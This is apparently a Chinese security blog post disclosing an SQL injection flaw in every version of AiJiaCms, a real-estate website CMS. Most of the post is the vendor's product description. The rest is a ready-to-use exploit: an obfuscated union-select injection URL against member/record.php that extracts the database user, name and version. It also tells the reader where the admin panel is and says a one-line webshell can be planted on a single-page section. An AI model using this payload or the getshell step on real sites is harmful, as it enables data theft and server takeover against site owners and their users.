AiJiaCms全版本sql注入

首发漏洞时代

AiJiaCms的介绍

爱家是目前市场上一家专注于房地产网站开发商,从前期销售到后期维护、更新、技术支持等一条龙式房产解决方案提供商。
爱家是国内房产网站建设首选品牌,程序采用高效率的 PHP5+MYSQL架构而成,历经3年多发展,从个人开发到团队开发,从业余开发到全职开发,爱家经历了质的蜕变。爱家的开发团 队人员齐整、分工明确,从项目策划、到程序开发、到客户端开发、到设计、到技术支持一应俱全,我们就是要高起点、做好一件事。
爱家将为准备运营地方房产网站项目的投资者提供一个高效、快速、专业的网站建设解决方案,将有效为其节省时间与资金的成本、大大降低项目风险 与门槛,使其能够把90%的财力与时间放在网站的运作上。

基于LAMP(linux+Apache+MySQL+PHP)的技术架构体系;
框架:采用MVC架构模式,实现MVC、缓存等框架设计;
移植:支持当前主流的虚拟主机的Windows、IIS服务器移植应用;
开源:支持代码全部开源、二次开发以及模板定制业务需求;

起初以为是多么的ok。但是后来发现和destoon简直如同一辙。好吧,其实就是destoon的注入漏洞

注册会员
member/record.php?action=pay&mid=-1/*!50000union*//*!50000select*/user(),2,database(),version(),5,6,7,8,9–

后台为admin

getshell
单页面处可以插入一句话

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录

  • 1 Responses to “AiJiaCms全版本sql注入”
    • 落花三千

      Destoon的孪生兄弟吗,因为我发现上次那个漏洞也可以在这套系统上利用